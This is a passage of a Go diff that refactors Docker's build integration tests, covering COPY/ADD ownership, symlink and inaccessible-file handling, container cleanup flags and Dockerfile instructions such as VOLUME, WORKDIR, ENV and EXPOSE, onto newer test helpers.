*DockerSuite) TestBuildCopySingleFileToNonExistDir(c *check.C) { - testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopysinglefiletononexistdir" - ctx, err := fakeContext(`FROM busybox + testRequires(c, DaemonIsLinux) // Linux specific + buildImageSuccessfully(c, "testcopysinglefiletononexistdir", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists @@ -1236,48 +871,28 @@ RUN chown dockerio.dockerio /exists COPY test_file /test_dir/ RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, - map[string]string{ - "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`), + build.WithFile("test_file", "test1"))) } func (s *DockerSuite) TestBuildCopyDirContentToRoot(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopydircontenttoroot" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testcopydircontenttoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists RUN chown dockerio.dockerio exists COPY test_dir / RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, - map[string]string{ - "test_dir/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l 
/exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`), + build.WithFile("test_dir/test_file", "test1"))) } func (s *DockerSuite) TestBuildCopyDirContentToExistDir(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopydircontenttoexistdir" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testcopydircontenttoexistdir", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN mkdir /exists @@ -1286,24 +901,14 @@ RUN chown -R dockerio.dockerio /exists COPY test_dir/ /exists/ RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ] -RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`, - map[string]string{ - "test_dir/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`), + build.WithFile("test_dir/test_file", "test1"))) } func (s *DockerSuite) TestBuildCopyWholeDirToRoot(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopywholedirtoroot" - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + buildImageSuccessfully(c, "testcopywholedirtoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists @@ -1313,36 +918,8 @@ RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l / | grep test_dir | awk '{print $1}') = 'drwxr-xr-x' ] RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /test_dir/test_file | awk '{print $1}') = '%s' ] 
-RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), - map[string]string{ - "test_dir/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } -} - -func (s *DockerSuite) TestBuildCopyEtcToRoot(c *check.C) { - name := "testcopyetctoroot" - - ctx, err := fakeContext(`FROM `+minimalBaseImage()+` -COPY . /`, - map[string]string{ - "etc/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod)), + build.WithFile("test_dir/test_file", "test1"))) } func (s *DockerSuite) TestBuildAddBadLinks(c *check.C) { @@ -1357,10 +934,7 @@ func (s *DockerSuite) TestBuildAddBadLinks(c *check.C) { var ( name = "test-link-absolute" ) - ctx, err := fakeContext(dockerfile, nil) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile)) defer ctx.Close() tempDir, err := ioutil.TempDir("", "test-link-absolute-temp-") @@ -1421,10 +995,7 @@ func (s *DockerSuite) TestBuildAddBadLinks(c *check.C) { c.Fatal(err) } - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) if _, err := os.Stat(nonExistingFile); err == nil || err != nil && !os.IsNotExist(err) { c.Fatalf("%s shouldn't have been written and it shouldn't exist", nonExistingFile) } @@ -1455,10 +1026,7 @@ func (s *DockerSuite) TestBuildAddBadLinksVolume(c *check.C) { dockerfile = fmt.Sprintf(dockerfileTemplate, tempDir) nonExistingFile := filepath.Join(tempDir, targetFile) - ctx, err := fakeContext(dockerfile, nil) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile)) defer 
ctx.Close() fooPath := filepath.Join(ctx.Dir, targetFile) @@ -1472,10 +1040,7 @@ func (s *DockerSuite) TestBuildAddBadLinksVolume(c *check.C) { c.Fatal(err) } - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) if _, err := os.Stat(nonExistingFile); err == nil || err != nil && !os.IsNotExist(err) { c.Fatalf("%s shouldn't have been written and it shouldn't exist", nonExistingFile) } @@ -1485,84 +1050,83 @@ func (s *DockerSuite) TestBuildAddBadLinksVolume(c *check.C) { // Issue #5270 - ensure we throw a better error than "unexpected EOF" // when we can't access files in the context. func (s *DockerSuite) TestBuildWithInaccessibleFilesInContext(c *check.C) { - testRequires(c, DaemonIsLinux, UnixCli) // test uses chown/chmod: not available on windows + testRequires(c, DaemonIsLinux, UnixCli, SameHostDaemon) // test uses chown/chmod: not available on windows { name := "testbuildinaccessiblefiles" - ctx, err := fakeContext("FROM scratch\nADD . /foo/", map[string]string{"fileWithoutReadAccess": "foo"}) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile("FROM scratch\nADD . 
/foo/"), + fakecontext.WithFiles(map[string]string{"fileWithoutReadAccess": "foo"}), + ) defer ctx.Close() // This is used to ensure we detect inaccessible files early during build in the cli client pathToFileWithoutReadAccess := filepath.Join(ctx.Dir, "fileWithoutReadAccess") - if err = os.Chown(pathToFileWithoutReadAccess, 0, 0); err != nil { + if err := os.Chown(pathToFileWithoutReadAccess, 0, 0); err != nil { c.Fatalf("failed to chown file to root: %s", err) } - if err = os.Chmod(pathToFileWithoutReadAccess, 0700); err != nil { + if err := os.Chmod(pathToFileWithoutReadAccess, 0700); err != nil { c.Fatalf("failed to chmod file to 700: %s", err) } - buildCmd := exec.Command("su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)) - buildCmd.Dir = ctx.Dir - out, _, err := runCommandWithOutput(buildCmd) - if err == nil { - c.Fatalf("build should have failed: %s %s", err, out) + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{"su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)}, + Dir: ctx.Dir, + }) + if result.Error == nil { + c.Fatalf("build should have failed: %s %s", result.Error, result.Combined()) } // check if we've detected the failure before we started building - if !strings.Contains(out, "no permission to read from ") { - c.Fatalf("output should've contained the string: no permission to read from but contained: %s", out) + if !strings.Contains(result.Combined(), "no permission to read from ") { + c.Fatalf("output should've contained the string: no permission to read from but contained: %s", result.Combined()) } - if !strings.Contains(out, "Error checking context") { - c.Fatalf("output should've contained the string: Error checking context") + if !strings.Contains(result.Combined(), "error checking context") { + c.Fatalf("output should've contained the string: error checking context") } } { name := "testbuildinaccessibledirectory" - ctx, err := fakeContext("FROM scratch\nADD . 
/foo/", map[string]string{"directoryWeCantStat/bar": "foo"}) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile("FROM scratch\nADD . /foo/"), + fakecontext.WithFiles(map[string]string{"directoryWeCantStat/bar": "foo"}), + ) defer ctx.Close() // This is used to ensure we detect inaccessible directories early during build in the cli client pathToDirectoryWithoutReadAccess := filepath.Join(ctx.Dir, "directoryWeCantStat") pathToFileInDirectoryWithoutReadAccess := filepath.Join(pathToDirectoryWithoutReadAccess, "bar") - if err = os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil { + if err := os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil { c.Fatalf("failed to chown directory to root: %s", err) } - if err = os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil { + if err := os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil { c.Fatalf("failed to chmod directory to 444: %s", err) } - if err = os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil { + if err := os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil { c.Fatalf("failed to chmod file to 700: %s", err) } - buildCmd := exec.Command("su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)) - buildCmd.Dir = ctx.Dir - out, _, err := runCommandWithOutput(buildCmd) - if err == nil { - c.Fatalf("build should have failed: %s %s", err, out) + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{"su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)}, + Dir: ctx.Dir, + }) + if result.Error == nil { + c.Fatalf("build should have failed: %s %s", result.Error, result.Combined()) } // check if we've detected the failure before we started building - if !strings.Contains(out, "can't stat") { - c.Fatalf("output should've contained the string: can't access %s", out) + if !strings.Contains(result.Combined(), "can't stat") { + c.Fatalf("output should've contained 
the string: can't access %s", result.Combined()) } - if !strings.Contains(out, "Error checking context") { - c.Fatalf("output should've contained the string: Error checking context\ngot:%s", out) + if !strings.Contains(result.Combined(), "error checking context") { + c.Fatalf("output should've contained the string: error checking context\ngot:%s", result.Combined()) } } { name := "testlinksok" - ctx, err := fakeContext("FROM scratch\nADD . /foo/", nil) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile("FROM scratch\nADD . /foo/")) defer ctx.Close() target := "../../../../../../../../../../../../../../../../../../../azA" @@ -1572,31 +1136,28 @@ func (s *DockerSuite) TestBuildWithInaccessibleFilesInContext(c *check.C) { defer os.Remove(target) // This is used to ensure we don't follow links when checking if everything in the context is accessible // This test doesn't require that we run commands as an unprivileged user - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) } { name := "testbuildignoredinaccessible" - ctx, err := fakeContext("FROM scratch\nADD . /foo/", - map[string]string{ + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile("FROM scratch\nADD . 
/foo/"), + fakecontext.WithFiles(map[string]string{ "directoryWeCantStat/bar": "foo", ".dockerignore": "directoryWeCantStat", - }) - if err != nil { - c.Fatal(err) - } + }), + ) defer ctx.Close() // This is used to ensure we don't try to add inaccessible files when they are ignored by a .dockerignore pattern pathToDirectoryWithoutReadAccess := filepath.Join(ctx.Dir, "directoryWeCantStat") pathToFileInDirectoryWithoutReadAccess := filepath.Join(pathToDirectoryWithoutReadAccess, "bar") - if err = os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil { + if err := os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil { c.Fatalf("failed to chown directory to root: %s", err) } - if err = os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil { + if err := os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil { c.Fatalf("failed to chmod directory to 444: %s", err) } - if err = os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil { + if err := os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil { c.Fatalf("failed to chmod file to 700: %s", err) } @@ -1610,27 +1171,18 @@ func (s *DockerSuite) TestBuildWithInaccessibleFilesInContext(c *check.C) { } func (s *DockerSuite) TestBuildForceRm(c *check.C) { - containerCountBefore, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) - } + containerCountBefore := getContainerCount(c) name := "testbuildforcerm" - ctx, err := fakeContext(`FROM `+minimalBaseImage()+` + r := buildImage(name, cli.WithFlags("--force-rm"), build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN true - RUN thiswillfail`, nil) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - dockerCmdInDir(c, ctx.Dir, "build", "-t", name, "--force-rm", ".") - - containerCountAfter, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) + RUN thiswillfail`))) + if r.ExitCode != 1 && r.ExitCode 
!= 127 { // different on Linux / Windows + c.Fatalf("Wrong exit code") } + containerCountAfter := getContainerCount(c) if containerCountBefore != containerCountAfter { c.Fatalf("--force-rm shouldn't have left containers behind") } @@ -1640,84 +1192,45 @@ func (s *DockerSuite) TestBuildForceRm(c *check.C) { func (s *DockerSuite) TestBuildRm(c *check.C) { name := "testbuildrm" - ctx, err := fakeContext(`FROM `+minimalBaseImage()+` - ADD foo / - ADD foo /`, map[string]string{"foo": "bar"}) - if err != nil { - c.Fatal(err) + testCases := []struct { + buildflags []string + shouldLeftContainerBehind bool + }{ + // Default case (i.e. --rm=true) + { + buildflags: []string{}, + shouldLeftContainerBehind: false, + }, + { + buildflags: []string{"--rm"}, + shouldLeftContainerBehind: false, + }, + { + buildflags: []string{"--rm=false"}, + shouldLeftContainerBehind: true, + }, } - defer ctx.Close() - { - containerCountBefore, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) - } - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--rm", "-t", name, ".") + for _, tc := range testCases { + containerCountBefore := getContainerCount(c) - if err != nil { - c.Fatal("failed to build the image", out) - } + buildImageSuccessfully(c, name, cli.WithFlags(tc.buildflags...), build.WithDockerfile(`FROM busybox + RUN echo hello world`)) - containerCountAfter, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) + containerCountAfter := getContainerCount(c) + if tc.shouldLeftContainerBehind { + if containerCountBefore == containerCountAfter { + c.Fatalf("flags %v should have left containers behind", tc.buildflags) + } + } else { + if containerCountBefore != containerCountAfter { + c.Fatalf("flags %v shouldn't have left containers behind", tc.buildflags) + } } - if containerCountBefore != containerCountAfter { - c.Fatalf("-rm shouldn't have left containers behind") - } - deleteImages(name) + 
dockerCmd(c, "rmi", name) } - - { - containerCountBefore, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) - } - - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", name, ".") - - if err != nil { - c.Fatal("failed to build the image", out) - } - - containerCountAfter, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) - } - - if containerCountBefore != containerCountAfter { - c.Fatalf("--rm shouldn't have left containers behind") - } - deleteImages(name) - } - - { - containerCountBefore, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) - } - - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--rm=false", "-t", name, ".") - - if err != nil { - c.Fatal("failed to build the image", out) - } - - containerCountAfter, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) - } - - if containerCountBefore == containerCountAfter { - c.Fatalf("--rm=false should have left containers behind") - } - deleteImages(name) - - } - -} +} func (s *DockerSuite) TestBuildWithVolumes(c *check.C) { testRequires(c, DaemonIsLinux) // Invalid volume paths on Windows @@ -1736,27 +1249,18 @@ func (s *DockerSuite) TestBuildWithVolumes(c *check.C) { "/test8]": emptyMap, } ) - _, err := buildImage(name, - `FROM scratch + + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch VOLUME /test1 VOLUME /test2 VOLUME /test3 /test4 VOLUME ["/test5", "/test6"] VOLUME [/test7 /test8] - `, - true) - if err != nil { - c.Fatal(err) - } - res := inspectFieldJSON(c, name, "Config.Volumes") + `)) - err = json.Unmarshal([]byte(res), &result) - if err != nil { - c.Fatal(err) - } + inspectFieldAndUnmarshall(c, name, "Config.Volumes", &result) equal := reflect.DeepEqual(&result, &expected) - if !equal { c.Fatalf("Volumes %s, expected %s", result, expected) } @@ -1766,14 +1270,10 @@ func (s 
*DockerSuite) TestBuildWithVolumes(c *check.C) { func (s *DockerSuite) TestBuildMaintainer(c *check.C) { name := "testbuildmaintainer" + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio`)) + expected := "dockerio" - _, err := buildImage(name, - `FROM `+minimalBaseImage()+` - MAINTAINER dockerio`, - true) - if err != nil { - c.Fatal(err) - } res := inspectField(c, name, "Author") if res != expected { c.Fatalf("Maintainer %s, expected %s", res, expected) @@ -1784,15 +1284,10 @@ func (s *DockerSuite) TestBuildUser(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuilduser" expected := "dockerio" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd USER dockerio - RUN [ $(whoami) = 'dockerio' ]`, - true) - if err != nil { - c.Fatal(err) - } + RUN [ $(whoami) = 'dockerio' ]`)) res := inspectField(c, name, "Config.User") if res != expected { c.Fatalf("User %s, expected %s", res, expected) @@ -1810,7 +1305,7 @@ func (s *DockerSuite) TestBuildRelativeWorkdir(c *check.C) { expectedFinal string ) - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected1 = `C:/` expected2 = `C:/test1` expected3 = `C:/test2` @@ -1824,19 +1319,15 @@ func (s *DockerSuite) TestBuildRelativeWorkdir(c *check.C) { expectedFinal = `/test2/test3` } - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN sh -c "[ "$PWD" = "`+expected1+`" ]" WORKDIR test1 RUN sh -c "[ "$PWD" = "`+expected2+`" ]" WORKDIR /test2 RUN sh -c "[ "$PWD" = "`+expected3+`" ]" WORKDIR test3 - RUN sh -c "[ "$PWD" = "`+expected4+`" ]"`, - true) - if err != nil { - c.Fatal(err) - } + RUN sh -c "[ "$PWD" = "`+expected4+`" ]"`)) + res := inspectField(c, name, "Config.WorkingDir") if res != expectedFinal { c.Fatalf("Workdir %s, expected %s", res, expectedFinal) @@ 
-1847,30 +1338,23 @@ func (s *DockerSuite) TestBuildRelativeWorkdir(c *check.C) { // Windows semantics. Most path handling verifications are in unit tests func (s *DockerSuite) TestBuildWindowsWorkdirProcessing(c *check.C) { testRequires(c, DaemonIsWindows) - name := "testbuildwindowsworkdirprocessing" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, "testbuildwindowsworkdirprocessing", build.WithDockerfile(`FROM busybox WORKDIR C:\\foo WORKDIR bar RUN sh -c "[ "$PWD" = "C:/foo/bar" ]" - `, - true) - if err != nil { - c.Fatal(err) - } + `)) } // #22181 Regression test. Most paths handling verifications are in unit test. // One functional test for end-to-end func (s *DockerSuite) TestBuildWindowsAddCopyPathProcessing(c *check.C) { testRequires(c, DaemonIsWindows) - name := "testbuildwindowsaddcopypathprocessing" // TODO Windows (@jhowardmsft). Needs a follow-up PR to 22181 to // support backslash such as .\\ being equivalent to ./ and c:\\ being // equivalent to c:/. This is not currently (nor ever has been) supported // by docker on the Windows platform. 
- dockerfile := ` - FROM busybox + buildImageSuccessfully(c, "testbuildwindowsaddcopypathprocessing", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox # No trailing slash on COPY/ADD # Results in dir being changed to a file WORKDIR /wc1 @@ -1888,43 +1372,29 @@ func (s *DockerSuite) TestBuildWindowsAddCopyPathProcessing(c *check.C) { ADD wd2 c:/wd2/ RUN sh -c "[ $(cat c:/wd1/wd1) = 'hellowd1' ]" RUN sh -c "[ $(cat c:/wd2/wd2) = 'worldwd2' ]" - ` - ctx, err := fakeContext(dockerfile, map[string]string{ - "wc1": "hellowc1", - "wc2": "worldwc2", - "wd1": "hellowd1", - "wd2": "worldwd2", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - _, err = buildImageFromContext(name, ctx, false) - if err != nil { - c.Fatal(err) - } + `), + build.WithFile("wc1", "hellowc1"), + build.WithFile("wc2", "worldwc2"), + build.WithFile("wd1", "hellowd1"), + build.WithFile("wd2", "worldwd2"), + )) } func (s *DockerSuite) TestBuildWorkdirWithEnvVariables(c *check.C) { name := "testbuildworkdirwithenvvariables" var expected string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = `C:\test1\test2` } else { expected = `/test1/test2` } - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox ENV DIRPATH /test1 ENV SUBDIRNAME test2 WORKDIR $DIRPATH - WORKDIR $SUBDIRNAME/$MISSING_VAR`, - true) - if err != nil { - c.Fatal(err) - } + WORKDIR $SUBDIRNAME/$MISSING_VAR`)) res := inspectField(c, name, "Config.WorkingDir") if res != expected { c.Fatalf("Workdir %s, expected %s", res, expected) @@ -1936,18 +1406,17 @@ func (s *DockerSuite) TestBuildRelativeCopy(c *check.C) { testRequires(c, NotUserNamespace) var expected string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = `C:/test1/test2` } else { expected = `/test1/test2` } - name := "testbuildrelativecopy" - dockerfile := ` - FROM busybox + buildImageSuccessfully(c, "testbuildrelativecopy", 
build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox WORKDIR /test1 WORKDIR test2 - RUN sh -c "[ "$PWD" = '` + expected + `' ]" + RUN sh -c "[ "$PWD" = '`+expected+`' ]" COPY foo ./ RUN sh -c "[ $(cat /test1/test2/foo) = 'hello' ]" ADD foo ./bar/baz @@ -1965,53 +1434,38 @@ func (s *DockerSuite) TestBuildRelativeCopy(c *check.C) { WORKDIR /test5/test6 COPY foo ../ RUN sh -c "[ $(cat /test5/foo) = 'hello' ]" - ` - ctx, err := fakeContext(dockerfile, map[string]string{ - "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - _, err = buildImageFromContext(name, ctx, false) - if err != nil { - c.Fatal(err) - } + `), + build.WithFile("foo", "hello"), + )) } +// FIXME(vdemeester) should be unit test func (s *DockerSuite) TestBuildBlankName(c *check.C) { name := "testbuildblankname" - _, _, stderr, err := buildImageWithStdoutStderr(name, - `FROM busybox - ENV =`, - true) - if err == nil { - c.Fatal("Build was supposed to fail but didn't") - } - if !strings.Contains(stderr, "ENV names can not be blank") { - c.Fatalf("Missing error message, got: %s", stderr) - } - - _, _, stderr, err = buildImageWithStdoutStderr(name, - `FROM busybox - LABEL =`, - true) - if err == nil { - c.Fatal("Build was supposed to fail but didn't") - } - if !strings.Contains(stderr, "LABEL names can not be blank") { - c.Fatalf("Missing error message, got: %s", stderr) + testCases := []struct { + expression string + expectedStderr string + }{ + { + expression: "ENV =", + expectedStderr: "ENV names can not be blank", + }, + { + expression: "LABEL =", + expectedStderr: "LABEL names can not be blank", + }, + { + expression: "ARG =foo", + expectedStderr: "ARG names can not be blank", + }, } - _, _, stderr, err = buildImageWithStdoutStderr(name, - `FROM busybox - ARG =foo`, - true) - if err == nil { - c.Fatal("Build was supposed to fail but didn't") - } - if !strings.Contains(stderr, "ARG names can not be blank") { - c.Fatalf("Missing error message, got: %s", 
stderr) + for _, tc := range testCases { + buildImage(name, build.WithDockerfile(fmt.Sprintf(`FROM busybox + %s`, tc.expression))).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: tc.expectedStderr, + }) } } @@ -2019,15 +1473,10 @@ func (s *DockerSuite) TestBuildEnv(c *check.C) { testRequires(c, DaemonIsLinux) // ENV expansion is different in Windows name := "testbuildenv" expected := "[PATH=/test:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PORT=2375]" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox ENV PATH /test:$PATH - ENV PORT 2375 - RUN [ $(env | grep PORT) = 'PORT=2375' ]`, - true) - if err != nil { - c.Fatal(err) - } + ENV PORT 2375 + RUN [ $(env | grep PORT) = 'PORT=2375' ]`)) res := inspectField(c, name, "Config.Env") if res != expected { c.Fatalf("Env %s, expected %s", res, expected) @@ -2039,14 +1488,11 @@ func (s *DockerSuite) TestBuildPATH(c *check.C) { defPath := "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" - fn := func(dockerfile string, exp string) { - _, err := buildImage("testbldpath", dockerfile, true) - c.Assert(err, check.IsNil) - + fn := func(dockerfile string, expected string) { + buildImageSuccessfully(c, "testbldpath", build.WithDockerfile(dockerfile)) res := inspectField(c, "testbldpath", "Config.Env") - - if res != exp { - c.Fatalf("Env %q, expected %q for dockerfile:%q", res, exp, dockerfile) + if res != expected { + c.Fatalf("Env %q, expected %q for dockerfile:%q", res, expected, dockerfile) } } @@ -2070,18 +1516,15 @@ func (s *DockerSuite) TestBuildContextCleanup(c *check.C) { testRequires(c, SameHostDaemon) name := "testbuildcontextcleanup" - entries, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + entries, err := ioutil.ReadDir(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "tmp")) if err != nil { c.Fatalf("failed to list contents of tmp dir: %s", err) } - _, err = buildImage(name, - `FROM `+minimalBaseImage()+` - 
ENTRYPOINT ["/bin/echo"]`, - true) - if err != nil { - c.Fatal(err) - } - entriesFinal, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + ENTRYPOINT ["/bin/echo"]`)) + + entriesFinal, err := ioutil.ReadDir(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "tmp")) if err != nil { c.Fatalf("failed to list contents of tmp dir: %s", err) } @@ -2095,18 +1538,17 @@ func (s *DockerSuite) TestBuildContextCleanupFailedBuild(c *check.C) { testRequires(c, SameHostDaemon) name := "testbuildcontextcleanup" - entries, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + entries, err := ioutil.ReadDir(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "tmp")) if err != nil { c.Fatalf("failed to list contents of tmp dir: %s", err) } - _, err = buildImage(name, - `FROM `+minimalBaseImage()+` - RUN /non/existing/command`, - true) - if err == nil { - c.Fatalf("expected build to fail, but it didn't") - } - entriesFinal, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp")) + + buildImage(name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + RUN /non/existing/command`)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) + + entriesFinal, err := ioutil.ReadDir(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "tmp")) if err != nil { c.Fatalf("failed to list contents of tmp dir: %s", err) } @@ -2116,17 +1558,32 @@ func (s *DockerSuite) TestBuildContextCleanupFailedBuild(c *check.C) { } +// compareDirectoryEntries compares two sets of FileInfo (usually taken from a directory) +// and returns an error if different. 
+func compareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error { + var ( + e1Entries = make(map[string]struct{}) + e2Entries = make(map[string]struct{}) + ) + for _, e := range e1 { + e1Entries[e.Name()] = struct{}{} + } + for _, e := range e2 { + e2Entries[e.Name()] = struct{}{} + } + if !reflect.DeepEqual(e1Entries, e2Entries) { + return fmt.Errorf("entries differ") + } + return nil +} + func (s *DockerSuite) TestBuildCmd(c *check.C) { name := "testbuildcmd" - expected := "[/bin/echo Hello World]" - _, err := buildImage(name, - `FROM `+minimalBaseImage()+` - CMD ["/bin/echo", "Hello World"]`, - true) - if err != nil { - c.Fatal(err) - } + + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + CMD ["/bin/echo", "Hello World"]`)) + res := inspectField(c, name, "Config.Cmd") if res != expected { c.Fatalf("Cmd %s, expected %s", res, expected) @@ -2137,13 +1594,10 @@ func (s *DockerSuite) TestBuildExpose(c *check.C) { testRequires(c, DaemonIsLinux) // Expose not implemented on Windows name := "testbuildexpose" expected := "map[2375/tcp:{}]" - _, err := buildImage(name, - `FROM scratch - EXPOSE 2375`, - true) - if err != nil { - c.Fatal(err) - } + + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch + EXPOSE 2375`)) + res := inspectField(c, name, 